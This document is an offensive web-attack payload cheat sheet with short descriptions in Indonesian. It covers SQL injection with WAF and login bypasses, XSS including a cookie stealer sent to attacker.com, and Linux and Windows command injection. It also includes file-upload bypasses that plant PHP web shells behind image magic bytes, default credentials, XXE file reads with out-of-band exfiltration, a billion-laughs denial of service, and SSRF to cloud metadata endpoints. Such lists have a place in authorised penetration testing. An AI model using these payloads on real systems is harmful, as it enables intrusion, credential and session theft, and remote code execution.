MySQL Payloads
Basic Union-Based SQLi
Union-based SQL injection untuk mengekstrak data dari database MySQL
' UNION SELECT NULL,NULL,NULL-- -
Database Version Detection
Mendeteksi versi database MySQL
' UNION SELECT @@version,NULL,NULL-- -
Extract Database Names
Mengambil semua nama database
' UNION SELECT schema_name,NULL,NULL FROM information_schema.schemata-- -
Extract Table Names
Mengambil nama tabel dari database tertentu
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables WHERE table_schema='DATABASE_NAME'-- -
Extract Column Names
Mengambil nama kolom dari tabel tertentu
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='TABLE_NAME'-- -
Time-Based Blind SQLi
Blind SQL injection menggunakan time delay
' AND SLEEP(5)-- -
Boolean-Based Blind SQLi
Blind SQL injection dengan boolean condition
' AND 1=1-- -
' AND 1=2-- -
WAF Bypass - Comment Obfuscation
Bypass WAF menggunakan MySQL comments
'/**/UNION/**/SELECT/**/NULL,NULL-- -
PostgreSQL Payloads
Basic Union-Based (PostgreSQL)
Union-based SQL injection untuk PostgreSQL
' UNION SELECT NULL,NULL,NULL-- -
PostgreSQL Version
Mendeteksi versi PostgreSQL
' UNION SELECT version(),NULL,NULL-- -
Time-Based Blind (PostgreSQL)
Time-based blind SQLi untuk PostgreSQL
' AND pg_sleep(5)-- -
MSSQL Payloads
Basic Union-Based (MSSQL)
Union-based SQL injection untuk MSSQL
' UNION SELECT NULL,NULL,NULL-- -
MSSQL Version
Mendeteksi versi MSSQL
' UNION SELECT @@version,NULL,NULL-- -
Time-Based Blind (MSSQL)
Time-based blind SQLi untuk MSSQL
' WAITFOR DELAY '0:0:5'-- -
Reflected XSS
Basic Alert Box
XSS payload dasar dengan alert box
<script>alert('XSS')</script>
Image Tag XSS
XSS menggunakan image tag dengan onerror event
<img src=x onerror=alert('XSS')>
SVG XSS
XSS menggunakan SVG tag
<svg/onload=alert('XSS')>
Body Onload XSS
XSS menggunakan body tag dengan onload event
<body onload=alert('XSS')>
Input Autofocus XSS
XSS menggunakan input dengan autofocus dan onfocus
<input autofocus onfocus=alert('XSS')>
Cookie Stealer
XSS untuk mencuri cookie dan mengirim ke attacker server
<script>document.location='http://attacker.com/?c='+document.cookie</script>
WAF Bypass XSS
Case Variation Bypass
Bypass filter dengan variasi case
<ScRiPt>alert('XSS')</sCrIpT>
Double Encoding
XSS dengan double URL encoding
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
Null Byte Injection
Bypass menggunakan null byte
<script>%00alert('XSS')</script>
HTML Entity Encoding
XSS dengan HTML entity encoding
<img src=x onerror="alert('XSS')">
DOM-Based XSS
Location Hash XSS
DOM XSS melalui location hash
#<img src=x onerror=alert('XSS')>
Document.write XSS
XSS melalui document.write sink
<script>document.write('<img src=x onerror=alert(1)>')</script>
Linux Command Injection
Basic Command Injection (Semicolon)
Command injection menggunakan semicolon separator
; whoami
Pipe Command Injection
Command injection menggunakan pipe
| whoami
AND Operator Injection
Command injection menggunakan AND operator
&& whoami
OR Operator Injection
Command injection menggunakan OR operator
|| whoami
Backtick Command Substitution
Command injection menggunakan backtick substitution
`whoami`
Dollar Parenthesis Substitution
Command injection menggunakan $() substitution
$(whoami)
Newline Injection
Command injection menggunakan newline character
%0a whoami
Time-Based Blind Injection
Blind command injection dengan time delay
; sleep 5
Output Redirection
Command injection dengan output redirection ke file
; whoami > /tmp/output.txt
Windows Command Injection
CMD Pipe Injection
Windows command injection dengan pipe
| whoami
CMD AND Operator
Windows command injection dengan AND
& whoami
PowerShell Injection
Injeksi PowerShell command
; powershell -c "whoami"
Extension Bypass
Double Extension
Bypass menggunakan double extension
shell.php.jpg
shell.php.png
shell.php.gif
Null Byte Injection
Bypass menggunakan null byte (PHP < 5.3.4)
shell.php%00.jpg
shell.php\x00.png
Case Variation
Bypass dengan variasi case pada extension
shell.pHp
shell.PhP
shell.PHP
Alternative PHP Extensions
Menggunakan alternative PHP extensions
shell.php3
shell.php4
shell.php5
shell.phtml
shell.pht
shell.phar
shell.php76
shell.phps
Trailing Spaces/Dots
Bypass dengan trailing spaces atau dots
shell.php.
shell.php..
shell.php
shell.php%20
Content-Type Bypass
MIME Type Manipulation
Mengganti Content-Type header untuk bypass validation
Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
Magic Bytes Manipulation
GIF Magic Bytes + PHP
File PHP dengan GIF magic bytes di awal
GIF89a;
<?php system($_GET['cmd']); ?>
JPEG Magic Bytes + PHP
File PHP dengan JPEG magic bytes (hex: FF D8 FF E0)
ÿØÿÃ
<?php system($_GET['cmd']); ?>
PNG Magic Bytes + PHP
File PHP dengan PNG magic bytes (hex: 89 50 4E 47)
‰PNG
<?php system($_GET['cmd']); ?>
.htaccess Upload
.htaccess - Execute as PHP
Upload .htaccess untuk menjalankan file tertentu sebagai PHP
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
SQL Authentication Bypass
Classic OR 1=1
Bypass login dengan OR condition yang selalu true
Username: admin' OR '1'='1
Password: admin' OR '1'='1
' or 1=1 limit 1 -- -+
' or 1=1 limit 1 -- -+
' or 1=1 limit 1 -- -+
' or 1=1 limit 1 -- -+
Comment-Based Bypass
Bypass dengan mengomentari sisa query
Username: admin'--
Username: admin'#
Username: admin'/*
UNION-Based Auth Bypass
Bypass menggunakan UNION SELECT
Username: ' UNION SELECT 'admin', 'password'--
Username: admin' UNION SELECT NULL,NULL--
Time-Based Blind Auth Bypass
Bypass dengan time-based blind injection
Username: admin' AND SLEEP(5)--
Username: admin' OR IF(1=1,SLEEP(5),0)--
NoSQL Authentication Bypass
Bypass untuk NoSQL databases (MongoDB)
Username: {"$gt":""}
Password: {"$gt":""}
Username: admin
Password: {"$ne":null}
Default Credentials
Common Default Logins
Daftar username dan password default yang umum digunakan
admin:admin
admin:password
admin:12345
administrator:administrator
root:root
root:toor
admin:admin123
guest:guest
user:user
XXE Injection Payloads
Basic XXE - File Read
XXE untuk membaca file lokal dari server
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
XXE - Read Windows Files
XXE untuk membaca file dari Windows system
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<foo>&xxe;</foo>
Blind XXE - OOB Data Exfiltration
Blind XXE dengan out-of-band data exfiltration
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<foo></foo>
XXE - SSRF Attack
XXE untuk melakukan SSRF ke internal network
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://127.0.0.1:80/">
]>
<foo>&xxe;</foo>
XXE - Billion Laughs (DoS)
XXE attack untuk DoS menggunakan entity expansion
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>
SSRF Payloads
Basic SSRF - Localhost
SSRF untuk akses localhost/internal services
http://127.0.0.1/
http://localhost/
http://0.0.0.0/
http://[::1]/
SSRF - Internal Network Scan
SSRF untuk scanning internal network
http://192.168.0.1/
http://192.168.1.1/
http://10.0.0.1/
http://172.16.0.1/
SSRF - Cloud Metadata
SSRF untuk akses cloud metadata services
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://metadata.google.internal/computeMetadata/v1/
SSRF Bypass - Using @ Symbol
Bypass SSRF filter menggunakan @ untuk redirect
http://expected-host@127.0.0.1/
http://expected-host@localhost/
SSRF Bypass - URL Encoding
Bypass SSRF filter dengan URL encoding
http://127.0.0.1/ → http://%31%32%37%2e%30%2e%30%2e%31/
http://localhost/ → http://%6c%6f%63%61%6c%68%6f%73%74/
SSRF Bypass - IP Obfuscation
Bypass menggunakan berbagai format IP address
http://2130706433/ (decimal)
http://0x7f000001/ (hexadecimal)
http://017700000001/ (octal)
http://127.1/
SSRF - File Protocol
SSRF menggunakan file protocol untuk read local files
file:///etc/passwd
file:///c:/windows/win.ini
file:///proc/self/environ